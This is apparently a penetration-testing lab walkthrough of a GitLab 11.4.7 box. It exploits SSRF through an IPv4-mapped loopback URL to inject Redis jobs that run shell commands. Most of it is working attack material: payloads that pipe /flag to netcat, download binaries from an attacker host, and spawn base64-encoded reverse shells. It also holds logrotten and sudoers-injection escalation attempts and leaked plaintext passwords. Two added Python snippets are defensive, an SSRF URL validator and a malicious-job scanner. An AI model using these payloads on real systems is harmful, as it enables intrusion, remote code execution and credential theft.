usual nmap:

22/tcp   open   ssh          OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 35:0f:c0:28:c9:0c:5b:59:69:99:98:b6:97:79:0a:3b (RSA)
|   256 9f:cf:bb:6e:9e:22:9c:8b:fb:b9:9e:cd:13:62:8f:59 (ECDSA)
|_  256 c2:15:d8:98:7c:d2:dd:a4:46:f2:09:4e:08:cb:3e:12 (ED25519)
25/tcp   closed smtp
80/tcp   open   http         nginx
|_http-favicon: Unknown favicon MD5: F7E3D97F404E71D302B3239EEF48D5F2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://vanadium.pg/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
81/tcp   closed hosts2-ns
110/tcp  closed pop3
143/tcp  closed imap
445/tcp  closed microsoft-ds
5432/tcp open   postgresql   PostgreSQL DB 9.6.7 - 9.6.10
| ssl-cert: Subject: commonName=PostgreSQL/organizationName=GitLab/countryName=USA
| Issuer: commonName=PostgreSQL/organizationName=GitLab/countryName=USA
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-12-23T13:27:10
| Not valid after:  2029-12-20T13:27:10
| MD5:   c8c8 a882 360f bb01 2ae7 d3ad 4523 8ad1
|_SHA-1: bf76 c61c 3eea 605b 1825 6e9a b1c9 1d61 037e 510d
8060/tcp open   http         nginx 1.12.1
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.12.1
|_http-title: 404 Not Found
8090/tcp open   http         Apache httpd 2.4.25 ((Debian))
|_http-generator: Jekyll v3.8.6
| http-git: 
|   172.16.10.10:8090/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Remotes:
|_      http://rob:GitBlameNotMe22@localhost:/rob/robs-awesome-website.git
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Cover Template \xC2\xB7 Bootstrap
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 80

GitLab Community Edition 11.4.7

there’s an rce exploit

https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/

poc payload (as published in the writeup, then adapted to this box):

 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc 172.16.10.222 4444\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

the request passed but no netcat connection comes back - maybe because redis isn’t running on the box.

found at http://vanadium.pg:8090/.git/config

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = http://rob:GitBlameNotMe22@localhost:/rob/robs-awesome-website.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master

import rob’s git with this url:

http://[0:0:0:0:0:ffff:127.0.0.1]/rob/robs-awesome-website.git

imported successfully, look into git and see a passwords.txt

robert:gitpushdashdashforce
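The import worked because the literal `[0:0:0:0:0:ffff:127.0.0.1]` is the loopback address written as an IPv4-mapped IPv6 address, so a string blocklist that only knows `127.0.0.1` and `localhost` lets it through. Added example (not GitLab's code, not from the writeup): a Python import-URL check that unwraps the mapped form and refuses non-HTTP schemes like the `git://...:6379` trick, next to the naive check it replaces; the address classes it rejects and the scheme allowlist are my choices.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}   # git:// lets the importer speak raw TCP to e.g. Redis


def naive_is_blocked(url: str) -> bool:
    """String blocklist of the kind the bracketed IPv4-mapped literal slips past (illustration)."""
    host = urlsplit(url).hostname or ""
    return host in {"127.0.0.1", "localhost", "0.0.0.0"}


def is_blocked(url: str) -> bool:
    """Reject import URLs whose scheme or literal host points at local or internal space."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return True
    host = parts.hostname          # brackets already stripped, lower-cased
    if not host:
        return True
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: resolve it and re-check every resulting address with the
        # same rules at connect time (not shown here); the literal itself is fine.
        return False
    # ::ffff:a.b.c.d is an IPv4 address in IPv6 clothing; judge the embedded IPv4.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


if __name__ == "__main__":
    for u in ("http://[0:0:0:0:0:ffff:127.0.0.1]/rob/robs-awesome-website.git",
              "git://[0:0:0:0:0:ffff:127.0.0.1]:6379/ssrf.git",
              "https://github.com/example/repo.git"):
        print(f"{u}: naive={naive_is_blocked(u)} strict={is_blocked(u)}")
```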

holy shit the poc actually works (tested with pingback):

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|ping 172.16.10.222\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git
kali@kali:~/offsec-pg/megacorp-one/vanadium$ sudo tcpdump ip proto \\icmp -i tap0
[sudo] password for kali: 
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tap0, link-type EN10MB (Ethernet), capture size 262144 bytes
22:00:16.233404 IP vanadium.pg > 172.16.10.222: ICMP echo request, id 16518, seq 1, length 64
22:00:16.233512 IP 172.16.10.222 > vanadium.pg: ICMP echo reply, id 16518, seq 1, length 64
22:00:17.235280 IP vanadium.pg > 172.16.10.222: ICMP echo request, id 16518, seq 2, length 64
22:00:17.235381 IP 172.16.10.222 > vanadium.pg: ICMP echo reply, id 16518, seq 2, length 64
22:00:18.301558 IP vanadium.pg > 172.16.10.222: ICMP echo request, id 16518, seq 3, length 64
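The pingback confirms the chain: the injected Sidekiq job asks GitlabShellWorker to run `class_eval` on a string that calls Ruby's `open('|...')`, which spawns a process. Added example (my own detection logic, not GitLab's or the writeup's): a Python scanner for entries dumped from the Redis job list that flags a GitlabShellWorker job whose first argument is not an expected gitlab-shell action, whose queue is not the one that worker normally uses, or whose arguments contain process-spawning Ruby. The action allowlist and the `gitlab_shell` queue name are assumptions; the two sample entries are constructed, the second modelled on the payload above.

```python
import json
import re

# Assumed for this example: actions a GitlabShellWorker job legitimately dispatches to
# Gitlab::Shell, and the queue such jobs are expected to sit on. Derive both from your version.
EXPECTED_ACTIONS = {"add_key", "remove_key", "add_repository", "remove_repository",
                    "mv_repository", "fork_repository", "import_repository"}
EXPECTED_QUEUE = "gitlab_shell"

# Ruby Kernel#open("|cmd"), IO.popen, backticks and system() all spawn a process.
SPAWN_RE = re.compile(r"""(?:open\(\s*['"]\||IO\.popen|`|system\()""")


def inspect_job(raw: str) -> list:
    """Return findings for one Sidekiq job payload (empty list = nothing suspicious)."""
    try:
        job = json.loads(raw)
    except ValueError:
        return ["payload is not valid JSON"]
    findings = []
    args = job.get("args") or []
    if job.get("class") == "GitlabShellWorker":
        action = args[0] if args else None
        if action not in EXPECTED_ACTIONS:
            findings.append(f"unexpected GitlabShellWorker action {action!r}")
        if job.get("queue") != EXPECTED_QUEUE:
            findings.append(f"job on queue {job.get('queue')!r}, expected {EXPECTED_QUEUE!r}")
    for arg in args:
        if isinstance(arg, str) and SPAWN_RE.search(arg):
            findings.append(f"argument spawns a process: {arg!r}")
    return findings


def scan_queue(entries: list) -> dict:
    """Map list index -> findings for every suspicious entry of a dumped Redis queue."""
    return {i: f for i, e in enumerate(entries) if (f := inspect_job(e))}


# Constructed sample: one benign key-sync job and one modelled on the payload above.
SAMPLE_QUEUE = [
    json.dumps({"class": "GitlabShellWorker", "args": ["add_key", "key-42", "ssh-ed25519 AAAA..."],
                "retry": 3, "queue": "gitlab_shell", "jid": "c0ffee00", "created_at": 1.0,
                "enqueued_at": 1.0}),
    json.dumps({"class": "GitlabShellWorker", "args": ["class_eval", "open('|ping 172.16.10.222').read"],
                "retry": 3, "queue": "system_hook_push", "jid": "ad52abc5641173e217eb2e52",
                "created_at": 1513714403.8122594, "enqueued_at": 1513714403.8129568}),
]

if __name__ == "__main__":
    for idx, findings in scan_queue(SAMPLE_QUEUE).items():
        print(f"entry {idx}:", "; ".join(findings))
```

Run the same function over `LRANGE resque:gitlab:queue:<name> 0 -1` output from the live instance to catch a job like this before Sidekiq picks it up.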

ok, the bash reverse shell payload doesn’t work:

bash -i >& /dev/tcp/172.16.10.222/4444 0>&1

more or less confirmed that nc doesn’t exist on the box.

download pwncat from my host; this worked:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|wget http://172.16.10.204/pwncat -O /tmp/pwncat\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

chmod +x /tmp/pwncat

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|chmod +x /tmp/pwncat\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

first signs of life:

sudo nc -lvnp 445 -keep-alive
listening on [any] 445 ...
connect to [172.16.10.204] from (UNKNOWN) [172.16.10.10] 48532
exec ep-alive failed : No such file or directory

chaining commands works:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
 multi
 sadd resque:gitlab:queues system_hook_push
 lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|wget http://172.16.10.204/testchain;wget http://172.16.10.204:445/testchain\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
 exec
 exec
/ssrf.git

prepare eval + base64:

echo "wget http://172.16.10.231/nc2 -O /dev/shm/nc2;chmod +x /dev/shm/nc2;/dev/shm/nc2 -e '/bin/bash' 172.16.10.231 8060" | base64 -w0
d2dldCBodHRwOi8vMTcyLjE2LjEwLjIzMS9uYzIgLU8gL2Rldi9zaG0vbmMyO2NobW9kICt4IC9kZXYvc2htL25jMjsvZGV2L3NobS9uYzIgLWUgJy9iaW4vYmFzaCcgMTcyLjE2LjEwLjIzMSA4MDYwCg==

prepare payload:

eval `echo d2dldCBodHRwOi8vMTcyLjE2LjEwLjIzMS9uYzIgLU8gL2Rldi9zaG0vbmMyO2NobW9kICt4IC9kZXYvc2htL25jMjsvZGV2L3NobS9uYzIgLWUgJy9iaW4vYmFzaCcgMTcyLjE2LjEwLjIzMSA4MDYwCg== | base64 --decode`

got shell on port 8060…but no (root) hash.

git@vanadium:/home/robert$ whoami
git
git@vanadium:/home/robert$ locate hash.txt
bash: locate: command not found
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert,,,:/home/robert:/bin/bash
gitlab-www:x:999:999::/var/opt/gitlab/nginx:/bin/false
git:x:998:998::/var/opt/gitlab:/bin/sh
gitlab-redis:x:997:997::/var/opt/gitlab/redis:/bin/false
gitlab-psql:x:996:996::/var/opt/gitlab/postgresql:/bin/sh
gitlab-prometheus:x:995:995::/var/opt/gitlab/prometheus:/bin/sh
git@vanadium:~/.ssh$ cat /var/opt/gitlab/gitlab-rails/etc/database.yml
# This file is managed by gitlab-ctl. Manual changes will be
# erased! To change the contents below, edit /etc/gitlab/gitlab.rb
# and run `sudo gitlab-ctl reconfigure`.

production:
  adapter: postgresql
  encoding: unicode
  collation: 
  database: gitlabhq_production
  pool: 10
  username: "gitlab"
  password: 
  host: "0.0.0.0"
  port: 5432
  socket: 
  sslmode: 
  sslcompression: 0
  sslrootcert: 
  sslca: 
  load_balancing: {"hosts":[]}
  prepared_statements: false
  statements_limit: 1000
  fdw: 

logrotten doesn’t seem to work (can’t force the rotation)

for example, this completed without even forcing a logrotate:

for i in $(seq 1 10000000);do echo "aaaaaaa" >> /var/log/gitlab/gitlab-rails/production_json.log;done
$
$ cat /etc/logrotate.conf
# see "man logrotate" for details
# rotate log files weekly
weekly

# keep 4 weeks worth of backlogs
rotate 4

# create new (empty) log files after rotating old ones
create

# uncomment this if you want your log files compressed
#compress

# packages drop log rotation information into this directory
include /etc/logrotate.d

# no packages own wtmp, or btmp -- we'll rotate them here
/var/log/wtmp {
    missingok
    monthly
    create 0664 root utmp
    rotate 1
}

/var/log/btmp {
    missingok
    monthly
    create 0660 root utmp
    rotate 1
}

# system-specific logs may be configured here

so logrotate actually worked, but no shell came back. refer: https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/4380

git@vanadium:/dev/shm$ cat payloadfile 
if [ 998 -eq 0 ]; then (/bin/nc -e /bin/bash 172.16.10.204 8090 &); fi
git@vanadium:/dev/shm$ ./logrotten -c /var/log/gitlab/gitlab-workhorse/something.log
Waiting for rotating /var/log/gitlab/gitlab-workhorse/something.log...
Renamed /var/log/gitlab/gitlab-workhorse with /var/log/gitlab/gitlab-workhorse2 and created symlink to /etc/bash_completion.d
Done!

change the payload file a little…

echo "echo 'git  ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> payloadfile

hm..wait. try this:

echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash 172.16.10.204 8090 &); fi" > /var/log/gitlab/gitlab-workhorse/wow.sh

didn’t seem to work.

go inside /var/log/gitlab/workhorse/

echo  "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash 172.16.10.204 8090 &); fi" > something.log.1.gz

ah, i didn’t put payload in the one that worked:

./logrotten -p ./payloadfile -c /var/log/gitlab/gitlab-workhorse/something.log

..still didn’t work, even though logrotten managed to open a symlink to /etc/bash_completion.d

echo "if [ `id -u` -eq 0 ]; then (echo "BOOM") && (echo 'git  ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers &); fi" > payloadfile

still didn’t work.

intermission

this could be a clue:

[*] pro020 Processes running with root permissions......................... yes!
---
START      PID     USER COMMAND
22:53     9626     root /usr/sbin/exim4 -Mc 1jd3Ef-0002V4-SO
22:53     9613     root sudo -S -l
22:53     9209     root /usr/sbin/exim4 -Mc 1jd3Ed-0002OC-Ug
22:53     9194     root sudo -S -l
22:53     9188     root sendmail -t
22:53     9187     root sudo -S id
22:53     8737     root sudo -S id
22:53    11360     root runsv prometheus
22:49     6595     root sleep 600
22:49     6591     root /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper

sshpass -p 'GitBlameNotMe22' ssh robert@vanadium.pg

robert can sudo, and that gives us root.